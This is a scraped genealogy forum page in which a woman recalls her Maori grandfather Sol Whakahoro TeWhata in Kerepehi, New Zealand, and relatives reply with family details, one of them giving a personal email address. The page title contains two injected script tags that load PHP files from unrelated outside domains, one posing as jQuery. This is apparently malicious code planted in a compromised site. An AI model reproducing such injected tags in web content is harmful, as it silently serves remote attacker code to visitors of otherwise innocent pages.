TeWhata Whakahoro Sol<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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TeWhata Whakahoro Sol

Journal by charlottereah

My name is Charlotte Reah (nee Edwards). My mother was Eva Topeora Edwards and her fathers name was Sol Whakahoro TeWhata born 1893. His parents on his marriage certificate to my grandmother Takiata Rangi Aruaru, was TeWhata TeWhata and his mother Heni TeWhata. My mother was from his second family along with James, Harata, Ned, Sol, Fred, Jimmy, Janie, Harry and Rangi. His first family were Queenie, David, Jack and Mary?

Jack, Sol, Janie, Rangi and Mary? are alive.

My grandfather worked on the Kauri gum when he first settled in Kerepeehi, Hauraki Plains. He and my grandmother Peti (Betty) raised all their children from that homestead. James was in the Maori Battallion and buried at Gallipoli.

My grandfather was known for his green fingers. During my childhood (nanadad) affectionately remembered by, always had a huge garden, huge orchard and constantly maintained the grounds around the homestead. The local people, Edmonds I remember always drove their tractor to the homestead to turn the soil on nanadads garden.

The garden stretched across the Hikaiiti property, Rangi Fraser property right up to Uncle Freds and Aunty Joys property. He built a shed beside the homestead to store potato and kumara under tea tree and hung his popcorn and onion to store. He was always immaculately tidy.

Nanadad read when he was relaxing. He had a full library of westerns. He and I would walk down to the casino to watch TV at Uncle Buff Rangi,s and Aunty Maata,s place (nee Baggs). He always waited for the Alfred Hitchcock movies to finish before we would walk home. Janie Pourau and Nick Thompson lived at the front of the casino.

He became a Jehovahs Witness 10 years before he passed away. Much loved grandfather.

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by charlottereah Profile | Research | Contact | Subscribe | Block this user
on 2007-08-18 02:29:58

charlottereah has been a Family Tree Circles member since Aug 2007. is researching the following names: TEWHATA, EDWARDS.

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by donnapalmer on 2007-09-12 00:32:57

Tena koe Charlotte

Janie Pourau and Poppa Nick are my grandparents and I know uncle Sol, he was married to my husbands aunty Taare (Diane Palmer). Growing up I remember the casino in Kerepehi. Thankyou for acknowledging my grandparents as people you remember. The Te Whata whanau are very well known and loved. My aunty Janie Ikinofo stays in Kerepehi do you as well?

arohanui Donna (Pourau) Palmer

by allycat on 2007-09-12 01:43:16
by jmtewhata on 2009-08-05 22:56:52

Kiaora fellow Te Whata, im on a journey finding my whanau and where we are from... I dnt no much just my father Piri Te Whata, his father Wira or Wiri Te Whata and wife being Ruth... Im just happy to see and hear Fellow Te Whata name holders an am trying and will keep trying to track my roots. Arohanui Jo Te Whata

by charlottereah on 2009-08-06 16:11:53

Kiaora Jo wonderful to hear from you. yes i have heard of your whanau around the traps and i will keep a record of the details you have sent - thankyou aroha charlotte. please keep in touch - i am in australia but my whanau are still in NZ.

by jmtewhata on 2009-08-09 22:22:24

It is wonderful alrite, it may be a coinsidence but a kare of mine had given me a number and a name,which was Sol Te Whata, and just as i gt the gauls to ring him i heard he had past away, i was so sadend Charlotte, really was. My half sister lives in auzy aswell, i have just gt bak into contact wid her threw ths familytree circles website so im wrapt. We both on same path, kewl aye.. Im also just loving finding other Te Whatas, i love it... My dad has 6 brothers and 1 sister, bt he doesnt no anything and i try nt to get angry with him because i realise they were strippd of there maori heritage a long time ago, an is now up to us to get it bak.. Im at course mondays and thursday so if you dont mind i will keep in touch.. arohaui jo

by charlottereah on 2009-08-10 15:30:34

Awesome - that was my uncle Sol who recently passed away - he married Diane nee Palmer from Matakana also deceased. My Koro's name was Sol Whakahoro Te Whata. If you are ever in Kerepehi (Hauraki Plains) check out the Kerepeehi marae - my koro and family photos are at that marae.
love to keep in touch aroha Charlotte

by jamo on 2010-08-14 07:20:49

hello there my name is andrew tewhata born in auckland,my father was piri tewhata i have an older sister lesley.we both live in australia,victoria our mother is aussie.i was looking for tewhatas when i seen yours i seen my half sister jo tewhata could not believe it i have no contact with her she is my baby sis.i would also love to find out more of our tewhata family

by charlottereah on 2010-09-01 05:36:51

ohh kiaora jamo and whanau. My husband and I have just returned to Coffs Harbour after 3 years in Box Hill South where my father in law is still looking after himself, we visit now and again so it would be good to catch up with whanau next time i am in melbourne. Meantime my email address is charlottereah@yahoo.com.au so if you up this way please let me know.
when you contact me on email i will send you some more photos of your whanau up north and extended families...kiaora cousin

by h_taukiri on 2010-09-07 02:17:08

Hi aunty, Wow the things my ears were turned off to when we were running around koros swimming in the drain, hahahaha. I am trying to find out our whakapapa. mum has told me bits but she is busy so I can't sit down with properly yet. And you know me when I want something I want it now hehehe. But so far my journey has been great. Hard to find things on Koros Whanau could you help me please. Love you Harata

by bettyscott on 2011-04-03 18:23:18

Hey Taat
Just stumbled across this site I,am trying to trace our heritage both mum and dad,I love your whakaro it was very beautiful arohanui

Betty scott nee(Tewhata)

by Findingmyhistory on 2015-03-09 20:48:53

Awe Ataahua cuzzy, i too have stumbled across this site, thats amazing how you can remember so much. im tryna find anything on Dad, ive tried every angle my memory can remember. would you possibly have a lead or guidance for me to start searching for anything. i recently came across a photo of Dad back in 1952 but then he was at least 6 or 7. would much appreciate your awhi. Kiaora Cousin.

Miria (Lollypop)

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